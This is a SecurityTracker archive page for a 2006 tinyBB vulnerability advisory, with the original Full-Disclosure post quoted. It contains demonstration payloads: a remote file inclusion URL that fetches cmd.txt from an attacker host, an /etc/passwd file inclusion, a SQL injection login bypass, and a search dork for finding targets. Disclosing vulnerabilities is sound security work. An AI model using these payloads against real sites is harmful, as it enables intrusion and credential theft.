SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   tinyBB Vendors:   epicdesigns.co.uk
tinyBB Bugs Permit Cross-Site Scripting and SQL Injection Attacks and Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016172
SecurityTracker URL:  http://securitytracker.com/id/1016172
CVE Reference:   CVE-2006-2739, CVE-2006-2740, CVE-2006-2741   (Links to External Site)
Updated:  Aug 25 2009
Original Entry Date:  May 29 2006
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 0.3 and prior versions
Description:   A vulnerability was reported in tinyBB. A remote user can include and execute arbitrary code on the target system. A remote user can conduct cross-site scripting attacks. A remote user can inject SQL commands.

The 'footers.php' script does not properly validate user-supplied input. If registers_global is enabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[tBBPath]/footers.php?tinybb_footers=http://[attacker]/cmd.txt?

The 'forgot.php' and 'login.php' scripts do not properly validate user-supplied input. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database. Other scripts and parameters are also affected.

A demonstration exploit URL is provided:

http://[target]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the tinyBB software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The vendor was notified on May 27, 2006.

A demonstration exploit is available at:

http://www.nukedx.com/?getxpl=33

Triginal advisory is available at:

http://www.nukedx.com/?viewdoc=33

Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the tinyBB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.epicdesigns.co.uk/projects/tinybb.php (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Advisory: tinyBB <= 0.3 Multiple Remote

--Security Report--
Advisory: tinyBB <= 0.3 Multiple Remote Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 05:37 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: Epicdesigns (http://www.epicdesigns.co.uk/)
Version: 0.3 and prior versions must be affected.
About: Via this methods remote attacker can include arbitrary files to  
tinyBB.tinybb_footers variable in
footers.php did not sanitized before using it.You can find vulnerable  
code in footers.php at line 3
-Source in footers.php-
3: if (strlen($tinybb_footers) > 0) { require_once($tinybb_footers); }
-End of source-
Fixing this vulnerability so easy turn off register_globals.
There is also SQL injection in forgot.php.Parameter $q did not  
sanitized properly before using it on SQL query.
You can find vulnerable codes in forgot.php at lines 3-18.
-Source in forgot.php-
3: if (isset($q)) {
4: $sql="SELECT COUNT(*) FROM tinybb_members WHERE username='$q' OR  
email='$q'";
5: $count = mysql_result(mysql_query($sql),0);
.....
-End of source-
Also this can be caused to XSS.You can find vulnerable code in  
forgot.php at line 19-21
-Source in forgot.php-
19:  else {
20:    echo "<p>The query <b>$q</b> could not be .....
21:  }
-End of source-
There is another SQL injection in login.php.Parameters username and  
password did not sanitized properly before using
it on SQL query.You can find vulnerable codes in login.php at line 2-8
-Source in login.php-
8: $sql="SELECT count(*) FROM tinybb_members WHERE flag='1' AND  
username='$username' AND password='$password'";
-End of source-
I didnt wrote all vulnerabilities on tinyBB there is too many SQL  
injections and XSS vulnerabilities on this tiny
bulletin board.
Level: Highly Critical
---
How&Example:
Succesful exploitation needs allow_url_fopen set to 1 and register_globals on
GET -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=evilscript
EXAMPLE ->  
http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?
If magic_quotes_gpc off remote attacker can include local files too
EXAMPLE -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00
SQL injection on login.php
GET ->  
http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=33
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=33
---
Dorks: "Powered by tinyBB"


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC